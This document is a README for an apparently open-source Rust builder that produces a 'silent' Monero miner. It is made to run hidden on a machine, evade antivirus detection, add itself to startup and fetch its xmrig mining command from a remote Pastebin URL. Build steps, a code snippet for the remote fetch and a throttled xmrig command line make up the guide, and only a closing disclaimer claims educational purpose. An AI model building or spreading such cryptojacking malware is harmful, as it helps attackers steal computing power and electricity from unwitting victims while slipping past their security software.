Welcome to the Silent XMR Miner Builder! This tool lets you create a silent miner for Monero (XMR), which runs quietly in the background and is designed to avoid detection by security software. The builder allows you to customize and build your own miner executable, which you can configure to mine using your specific xmrig commands.
- Startup: It adds miner to startup.
- Instalation: Intsalls xmrrig if not yet intsalled.
- 3 Detection on virus tottal: https://www.virustotal.com/gui/file/fe23ce5ded67a1c139300b3068166dccf0bcd8c2350e3b882a4e756473651d57
- Free to Use: The miner builder is open-source and available at no cost.
- Custom Configuration: Users must create their own xmrrig configuration.
To build and run this project, you need to have Rust installed.
- Download and Install Rust:
- Go to the official Rust installation page: https://www.rust-lang.org/tools/install.
- Follow the instructions for your operating system. Rust can be installed via rustup, a tool that helps manage Rust versions and associated tools.
After installation, check that Rust is installed properly by running this command:
rustc --version
You should see something like this:
rustc 1.65.0 (897e37553 2022-11-02)
First, clone this repository to your local machine using Git and navigate into the project directory.
git clone https://github.com/yourusername/silent-xmr-miner.git
cd silent-xmr-miner
Go to Pastebin and create a new paste with your XMRig mining command. This will include things like the pool address and your wallet address.
Once your paste is created, copy the raw URL.
For example, your URL might look like this:
https://pastebin.com/raw/yourpastebinid
command should look like this
-o xmr-eu1.nanopool.org:10343 -a rx -k --tls -u youraddress.nameyouwant -p x --cpu-priority 1 --cpu-max-threads-hint 45 --randomx-mode light --donate-level 0 --background --cpu-affinity 1 --max-cpu-usage 35
Open the source code file and replace the URL in the specified line with your own Pastebin link.
let process_config = client.get("https://pastebin.com/raw/yourpastebinid")
.send()
.unwrap()
.text()
.unwrap_or_default();
In the terminal, inside the project directory, run the build command to compile the project in release mode.
cargo build --release
- Customization: Make sure your Pastebin contains the correct configuration for XMRig to mine with your pool address and wallet.
- Be Responsible: Only use this tool on systems where you have permission to run mining software.
This tool is provided as-is, and it’s for educational purposes only. Please use it responsibly and make sure you have permission to mine on the system you’re using.